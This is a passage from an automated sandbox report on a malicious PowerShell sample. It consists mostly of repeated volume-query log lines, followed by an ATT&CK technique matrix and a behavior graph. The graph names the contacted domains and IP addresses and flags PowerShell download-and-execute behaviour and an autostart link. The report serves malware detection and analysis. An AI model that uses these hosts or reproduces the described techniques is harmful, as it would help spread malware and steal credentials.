      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts1
      PowerShell      		1
      Scripting      		11
      Process Injection      		11
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578233 Sample: gCXzb0K8Ci.ps1 Startdate: 19/12/2024 Architecture: WINDOWS Score: 84 26 x1.i.lencr.org 2->26 28 www.bluemaxxlaser.com 2->28 30 5 other IPs or domains 2->30 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected Powershell download and execute 2->42 44 3 other signatures 2->44 9 powershell.exe 16 23 2->9         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 32 www.bluemaxxlaser.com 203.175.174.69, 49705, 80 SGGS-AS-APSGGSSG Singapore 9->32 34 astenterprises.com.pk 107.161.23.150, 443, 49704 RAMNODEUS United States 9->34 46 Powershell creates an autostart link 9->46 15 powershell.exe 23 9->15         started        18 Acrobat.exe 18 61 9->18         started        20 conhost.exe 9->20         started        36 127.0.0.1 unknown unknown 13->36 signatures6 process7 signatures8 48 Loading BitLocker PowerShell Module 15->48 22 AcroCEF.exe 106 18->22         started        process9 process10 24 AcroCEF.exe 22->24         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
